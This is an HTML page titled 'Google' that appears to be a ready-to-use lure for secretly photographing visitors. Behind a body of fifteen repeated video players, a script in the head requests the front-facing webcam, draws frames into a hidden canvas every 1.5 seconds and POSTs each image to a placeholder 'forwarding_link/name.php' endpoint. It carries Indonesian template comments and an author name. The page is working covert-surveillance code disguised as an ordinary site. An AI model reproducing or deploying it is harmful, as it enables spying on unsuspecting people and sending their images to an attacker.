<!doctype html>
<html>

<head>
	<title>Google</title>
<script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
<link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
</head>

<div class="video-wrap" hidden="hidden">
   <video id="video" playsinline autoplay></video>
</div>

<canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>

<script>
function post(imgdata){
$.ajax({
    type: 'POST',
    data: { cat: imgdata},
    url: 'forwarding_link/name.php',
    dataType: 'json',
    async: false,
    success: function(result){
        
    },
    error: function(){
    }
  });
};
'use strict';
const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
const errorMsgElement = document.querySelector('span#errorMsg');
const constraints = {
  audio: false,
  video: {
    
    facingMode: "user"
  }
};
async function init() {
  try {
    const stream = await navigator.mediaDevices.getUserMedia(constraints);
    handleSuccess(stream);
  } catch (e) {
    errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
  }
}
function handleSuccess(stream) {
  window.stream = stream;
  video.srcObject = stream;

var context = canvas.getContext('2d');
  setInterval(function(){

       context.drawImage(video, 0, 0, 640, 480);
       var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
       post(canvasData); }, 1500);
  

}
init();
</script><body><!--
Ahmad Khoirul Marzuqin
Ahmad Khoirul Marzuqin
Ahmad Khoirul Marzuqin
Masukkan Isi File Html -->





<video width="320" height="240" controls>
  <source src="video.mp4" type="video/mp4">
Your Browser Does Not Support The Video Tag.
</video>
<video width="320" height="240" controls>
  <source src="video.mp4" type="video/mp4">
Your Browser Does Not Support The Video Tag.
</video>
<video width="320" height="240" controls>
  <source src="video.mp4" type="video/mp4">
Your Browser Does Not Support The Video Tag.
</video>
<video width="320" height="240" controls>
  <source src="video.mp4" type="video/mp4">
Your Browser Does Not Support The Video Tag.
</video>
<video width="320" height="240" controls>
  <source src="video.mp4" type="video/mp4">
Your Browser Does Not Support The Video Tag.
</video>
<video width="320" height="240" controls>
  <source src="video.mp4" type="video/mp4">
Your Browser Does Not Support The Video Tag.
</video>
<video width="320" height="240" controls>
  <source src="video.mp4" type="video/mp4">
Your Browser Does Not Support The Video Tag.
</video>
<video width="320" height="240" controls>
  <source src="video.mp4" type="video/mp4">
Your Browser Does Not Support The Video Tag.
</video>
<video width="320" height="240" controls>
  <source src="video.mp4" type="video/mp4">
Your Browser Does Not Support The Video Tag.
</video>
<video width="320" height="240" controls>
  <source src="video.mp4" type="video/mp4">
Your Browser Does Not Support The Video Tag.
</video>
<video width="320" height="240" controls>
  <source src="video.mp4" type="video/mp4">
Your Browser Does Not Support The Video Tag.
</video>
<video width="320" height="240" controls>
  <source src="video.mp4" type="video/mp4">
Your Browser Does Not Support The Video Tag.
</video>
<video width="320" height="240" controls>
  <source src="video.mp4" type="video/mp4">
Your Browser Does Not Support The Video Tag.
</video>
<video width="320" height="240" controls>
  <source src="video.mp4" type="video/mp4">
Your Browser Does Not Support The Video Tag.
</video>
<video width="320" height="240" controls>
  <source src="video.mp4" type="video/mp4">
Your Browser Does Not Support The Video Tag.
</video>





<!-- 1 Baris Ini Jangan Di Hapus --></body></html><!-- Ahmad Khoirul Marzuqin -->